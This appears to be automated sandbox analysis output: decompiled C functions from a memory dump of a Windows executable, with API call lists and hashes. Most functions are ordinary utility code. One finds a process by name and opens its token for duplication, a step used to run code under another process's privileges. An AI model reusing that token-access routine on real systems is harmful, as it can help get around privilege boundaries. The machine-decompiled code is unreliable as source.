                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                          			E00404706(long __edi, wchar_t* _a4) {
                                                                                                                                                                                                                          				short _v8;
                                                                                                                                                                                                                          				void* _t8;
                                                                                                                                                                                                                          				void* _t10;
                                                                                                                                                                                                                          				long _t14;
                                                                                                                                                                                                                          				long _t24;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t24 = __edi;
                                                                                                                                                                                                                          				_t8 = 0;
                                                                                                                                                                                                                          				_t14 = 0x1100;
                                                                                                                                                                                                                          				if(__edi - 0x834 <= 0x383) {
                                                                                                                                                                                                                          					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
                                                                                                                                                                                                                          					if(0 != 0) {
                                                                                                                                                                                                                          						_t14 = 0x1900;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
                                                                                                                                                                                                                          					_t10 = wcscpy(_a4, 0x40c4e8);
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					if(wcslen(_v8) < 0x400) {
                                                                                                                                                                                                                          						wcscpy(_a4, _v8);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t10 = LocalFree(_v8);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t10;
                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00404756
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404766
                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404780
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                                                          • String ID: netmsg.dll
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                          			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                                                          				void _v582;
                                                                                                                                                                                                                          				long _v584;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				intOrPtr _t27;
                                                                                                                                                                                                                          				wchar_t* _t34;
                                                                                                                                                                                                                          				wchar_t* _t42;
                                                                                                                                                                                                                          				long* _t43;
                                                                                                                                                                                                                          				int _t44;
                                                                                                                                                                                                                          				void* _t52;
                                                                                                                                                                                                                          				void* _t54;
                                                                                                                                                                                                                          				long _t56;
                                                                                                                                                                                                                          				long* _t57;
                                                                                                                                                                                                                          				void* _t60;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t60 = __eflags;
                                                                                                                                                                                                                          				_t52 = __edx;
                                                                                                                                                                                                                          				E004095AB( &_v72);
                                                                                                                                                                                                                          				_v584 = 0;
                                                                                                                                                                                                                          				memset( &_v582, 0, 0x1fe);
                                                                                                                                                                                                                          				E004095FD(_t52, _t60,  &_v72);
                                                                                                                                                                                                                          				_t27 = 0;
                                                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                                                          				if(_v20 <= 0) {
                                                                                                                                                                                                                          					L10:
                                                                                                                                                                                                                          					_t56 = 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                          						_t57 = E00405A92(_t27,  &_v32);
                                                                                                                                                                                                                          						if(E00409A94( *_t57,  &_v584) == 0) {
                                                                                                                                                                                                                          							goto L9;
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_t34 =  &_v584;
                                                                                                                                                                                                                          							_push(_t34);
                                                                                                                                                                                                                          							_push(_a4);
                                                                                                                                                                                                                          							L0040B278();
                                                                                                                                                                                                                          							if(_t34 == 0) {
                                                                                                                                                                                                                          								L5:
                                                                                                                                                                                                                          								_t44 = 0;
                                                                                                                                                                                                                          								_t54 = OpenProcess(0x2000000, 0,  *_t57);
                                                                                                                                                                                                                          								if(_t54 == 0) {
                                                                                                                                                                                                                          									goto L9;
                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                          									_v16 = _v16 & 0;
                                                                                                                                                                                                                          									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
                                                                                                                                                                                                                          										_t44 = 1;
                                                                                                                                                                                                                          										CloseHandle(_v16);
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          									CloseHandle(_t54);
                                                                                                                                                                                                                          									if(_t44 != 0) {
                                                                                                                                                                                                                          										_t56 =  *_t57;
                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                          										goto L9;
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                          								_t42 = wcschr( &_v584, 0x5c);
                                                                                                                                                                                                                          								if(_t42 == 0) {
                                                                                                                                                                                                                          									goto L9;
                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                          									_t43 =  &(_t42[0]);
                                                                                                                                                                                                                          									_push(_t43);
                                                                                                                                                                                                                          									_push(_a4);
                                                                                                                                                                                                                          									L0040B278();
                                                                                                                                                                                                                          									if(_t43 != 0) {
                                                                                                                                                                                                                          										goto L9;
                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                          										goto L5;
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						goto L12;
                                                                                                                                                                                                                          						L9:
                                                                                                                                                                                                                          						_t27 = _v12 + 1;
                                                                                                                                                                                                                          						_v12 = _t27;
                                                                                                                                                                                                                          					} while (_t27 < _v20);
                                                                                                                                                                                                                          					goto L10;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				L12:
                                                                                                                                                                                                                          				E004095DA( &_v72);
                                                                                                                                                                                                                          				return _t56;
                                                                                                                                                                                                                          			}






















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004059B5
                                                                                                                                                                                                                            • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
                                                                                                                                                                                                                            • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                                                                                                                                                                            • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                                                                                                                            • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                                                                                                                            • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                                                                                                                            • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                                                                                                                                                                            • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                                                                                                                                                                            • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                                                                                                                            • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                                                                                                                                                                            • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                                                                                                                            • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                                                                                                                            • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00405A0E
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 768606695-0
                                                                                                                                                                                                                          • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                                                                                                                          • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                                                          			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                          				void _v68;
                                                                                                                                                                                                                          				char _v108;
                                                                                                                                                                                                                          				void _v160;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				signed int _t55;
                                                                                                                                                                                                                          				void* _t57;
                                                                                                                                                                                                                          				wchar_t* _t67;
                                                                                                                                                                                                                          				intOrPtr* _t73;
                                                                                                                                                                                                                          				signed int _t74;
                                                                                                                                                                                                                          				signed int _t86;
                                                                                                                                                                                                                          				signed int _t95;
                                                                                                                                                                                                                          				intOrPtr* _t98;
                                                                                                                                                                                                                          				void* _t100;
                                                                                                                                                                                                                          				void* _t102;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t73 = __ebx;
                                                                                                                                                                                                                          				_t74 = 0xd;
                                                                                                                                                                                                                          				_push(9);
                                                                                                                                                                                                                          				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
                                                                                                                                                                                                                          				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
                                                                                                                                                                                                                          				_t102 = _t100 + 0x18;
                                                                                                                                                                                                                          				asm("movsw");
                                                                                                                                                                                                                          				E00407343(__ebx, _a4, L"<tr>");
                                                                                                                                                                                                                          				_t95 = 0;
                                                                                                                                                                                                                          				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                          						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
                                                                                                                                                                                                                          						_v8 = _t55;
                                                                                                                                                                                                                          						_t57 =  &_v160;
                                                                                                                                                                                                                          						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
                                                                                                                                                                                                                          							_t57 =  &_v68;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t98 = _a8;
                                                                                                                                                                                                                          						_v28 = _v28 | 0xffffffff;
                                                                                                                                                                                                                          						_v24 = _v24 | 0xffffffff;
                                                                                                                                                                                                                          						_v20 = _v20 | 0xffffffff;
                                                                                                                                                                                                                          						_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                                          						_v12 = _t57;
                                                                                                                                                                                                                          						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
                                                                                                                                                                                                                          						E0040ADC0(_v28,  &_v108);
                                                                                                                                                                                                                          						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
                                                                                                                                                                                                                          						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
                                                                                                                                                                                                                          						_t67 =  *(_t73 + 0x64);
                                                                                                                                                                                                                          						_t86 =  *_t67 & 0x0000ffff;
                                                                                                                                                                                                                          						if(_t86 == 0 || _t86 == 0x20) {
                                                                                                                                                                                                                          							wcscat(_t67, L"&nbsp;");
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
                                                                                                                                                                                                                          						_push( *((intOrPtr*)(_t73 + 0x68)));
                                                                                                                                                                                                                          						_push( &_v108);
                                                                                                                                                                                                                          						_push(_v12);
                                                                                                                                                                                                                          						_push(0x2000);
                                                                                                                                                                                                                          						_push( *((intOrPtr*)(_t73 + 0x60)));
                                                                                                                                                                                                                          						L0040B1EC();
                                                                                                                                                                                                                          						_t102 = _t102 + 0x1c;
                                                                                                                                                                                                                          						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
                                                                                                                                                                                                                          						_t95 = _t95 + 1;
                                                                                                                                                                                                                          					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return E00407343(_t73, _a4, L"\r\n");
                                                                                                                                                                                                                          			}
























                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintfwcscat
                                                                                                                                                                                                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                          • API String ID: 384018552-4153097237
                                                                                                                                                                                                                          • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                                                                                                                          • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 42%
                                                                                                                                                                                                                          			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
                                                                                                                                                                                                                          				struct tagMENUITEMINFOW _v0;
                                                                                                                                                                                                                          				int _t24;
                                                                                                                                                                                                                          				wchar_t* _t30;
                                                                                                                                                                                                                          				intOrPtr _t32;
                                                                                                                                                                                                                          				int _t34;
                                                                                                                                                                                                                          				int _t42;
                                                                                                                                                                                                                          				signed int _t47;
                                                                                                                                                                                                                          				signed int _t48;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t36 = __ecx;
                                                                                                                                                                                                                          				_t48 = _t47 & 0xfffffff8;
                                                                                                                                                                                                                          				E0040B550(0x203c, __ecx);
                                                                                                                                                                                                                          				_t24 = GetMenuItemCount(_a8);
                                                                                                                                                                                                                          				_t34 = _t24;
                                                                                                                                                                                                                          				_t42 = 0;
                                                                                                                                                                                                                          				if(_t34 <= 0) {
                                                                                                                                                                                                                          					L13:
                                                                                                                                                                                                                          					return _t24;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					goto L1;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                          					L1:
                                                                                                                                                                                                                          					memset( &_a50, 0, 0x2000);
                                                                                                                                                                                                                          					_t48 = _t48 + 0xc;
                                                                                                                                                                                                                          					_a36 =  &_a48;
                                                                                                                                                                                                                          					_v0.cbSize = 0x30;
                                                                                                                                                                                                                          					_a4 = 0x36;
                                                                                                                                                                                                                          					_a40 = 0x1000;
                                                                                                                                                                                                                          					_a16 = 0;
                                                                                                                                                                                                                          					_a48 = 0;
                                                                                                                                                                                                                          					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
                                                                                                                                                                                                                          					if(_t24 == 0) {
                                                                                                                                                                                                                          						goto L12;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					if(_a48 == 0) {
                                                                                                                                                                                                                          						L10:
                                                                                                                                                                                                                          						_t56 = _a20;
                                                                                                                                                                                                                          						if(_a20 != 0) {
                                                                                                                                                                                                                          							_push(0);
                                                                                                                                                                                                                          							_push(_a20);
                                                                                                                                                                                                                          							_push(_a4);
                                                                                                                                                                                                                          							_t24 = E0040605E(_t36, _t56);
                                                                                                                                                                                                                          							_t48 = _t48 + 0xc;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						goto L12;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t30 = wcschr( &_a48, 9);
                                                                                                                                                                                                                          					if(_t30 != 0) {
                                                                                                                                                                                                                          						 *_t30 = 0;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t31 = _a16;
                                                                                                                                                                                                                          					if(_a20 != 0) {
                                                                                                                                                                                                                          						if(_a12 == 0) {
                                                                                                                                                                                                                          							 *0x40fe20 =  *0x40fe20 + 1;
                                                                                                                                                                                                                          							_t32 =  *0x40fe20; // 0x0
                                                                                                                                                                                                                          							_t31 = _t32 + 0x11558;
                                                                                                                                                                                                                          							__eflags = _t32 + 0x11558;
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_t17 = _t42 + 0x11171; // 0x11171
                                                                                                                                                                                                                          							_t31 = _t17;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t24 = E00406025(_t31,  &_a48);
                                                                                                                                                                                                                          					_pop(_t36);
                                                                                                                                                                                                                          					goto L10;
                                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                                          					_t42 = _t42 + 1;
                                                                                                                                                                                                                          				} while (_t42 < _t34);
                                                                                                                                                                                                                          				goto L13;
                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                                                          • API String ID: 2029023288-3849865405
                                                                                                                                                                                                                          • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                                                                                                                          • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                                          			E00402BEE(void* __ebx) {
                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                          				int _v28;
                                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                                          				int _t31;
                                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                                          				int _t37;
                                                                                                                                                                                                                          				int _t38;
                                                                                                                                                                                                                          				int _t41;
                                                                                                                                                                                                                          				int _t50;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t34 = __ebx;
                                                                                                                                                                                                                          				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
                                                                                                                                                                                                                          					return _t27;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					asm("movsd");
                                                                                                                                                                                                                          					asm("movsd");
                                                                                                                                                                                                                          					asm("movsd");
                                                                                                                                                                                                                          					asm("movsd");
                                                                                                                                                                                                                          					_v8 = GetSystemMetrics(0x4e);
                                                                                                                                                                                                                          					_v12 = GetSystemMetrics(0x4f);
                                                                                                                                                                                                                          					_t41 = GetSystemMetrics(0x4c);
                                                                                                                                                                                                                          					_t31 = GetSystemMetrics(0x4d);
                                                                                                                                                                                                                          					if(_v8 == 0 || _v12 == 0) {
                                                                                                                                                                                                                          						_v8 = GetSystemMetrics(0);
                                                                                                                                                                                                                          						_v12 = GetSystemMetrics(1);
                                                                                                                                                                                                                          						_t41 = 0;
                                                                                                                                                                                                                          						_t31 = 0;
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						_v8 = _v8 + _t41;
                                                                                                                                                                                                                          						_v12 = _v12 + _t31;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t50 = _v20 - _v28;
                                                                                                                                                                                                                          					if(_t50 > 0x14) {
                                                                                                                                                                                                                          						_t38 = _v24;
                                                                                                                                                                                                                          						_t37 = _v16 - _t38;
                                                                                                                                                                                                                          						if(_t37 > 0x14 && _v20 > _t41 + 5) {
                                                                                                                                                                                                                          							_t31 = _t31 + 0xfffffff6;
                                                                                                                                                                                                                          							if(_t38 >= _t31) {
                                                                                                                                                                                                                          								_t31 = _v28;
                                                                                                                                                                                                                          								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
                                                                                                                                                                                                                          									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					return _t31;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00402C1C
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00402C23
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00402C2A
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00402C30
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00402C47
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00402C4E
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MetricsSystem$Window
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1155976603-0
                                                                                                                                                                                                                          • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                                                                                                                          • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004036D5(void* __edi, void* __eflags) {
                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                          				char* _v24;
                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                          				char* _v48;
                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                                                          				int _v64;
                                                                                                                                                                                                                          				int _v72;
                                                                                                                                                                                                                          				intOrPtr _v76;
                                                                                                                                                                                                                          				wchar_t* _v80;
                                                                                                                                                                                                                          				intOrPtr _v84;
                                                                                                                                                                                                                          				int _v92;
                                                                                                                                                                                                                          				char* _v96;
                                                                                                                                                                                                                          				intOrPtr _v104;
                                                                                                                                                                                                                          				struct tagOFNA _v108;
                                                                                                                                                                                                                          				void _v634;
                                                                                                                                                                                                                          				long _v636;
                                                                                                                                                                                                                          				void _v2682;
                                                                                                                                                                                                                          				char _v2684;
                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                          				char _t37;
                                                                                                                                                                                                                          				intOrPtr _t38;
                                                                                                                                                                                                                          				int _t46;
                                                                                                                                                                                                                          				signed short _t54;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_v636 = 0;
                                                                                                                                                                                                                          				memset( &_v634, 0, 0x208);
                                                                                                                                                                                                                          				_v2684 = 0;
                                                                                                                                                                                                                          				memset( &_v2682, 0, 0x7fe);
                                                                                                                                                                                                                          				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
                                                                                                                                                                                                                          				_v12 = _t37;
                                                                                                                                                                                                                          				_t38 =  *0x40cbf0; // 0x67
                                                                                                                                                                                                                          				_v8 = _t38;
                                                                                                                                                                                                                          				_v28 = E00405B81(0x227);
                                                                                                                                                                                                                          				_v24 = L"*.cfg";
                                                                                                                                                                                                                          				_v20 = E00405B81(0x228);
                                                                                                                                                                                                                          				_v16 = L"*.*";
                                                                                                                                                                                                                          				E00405236( &_v2684,  &_v28);
                                                                                                                                                                                                                          				_t54 = 0xa;
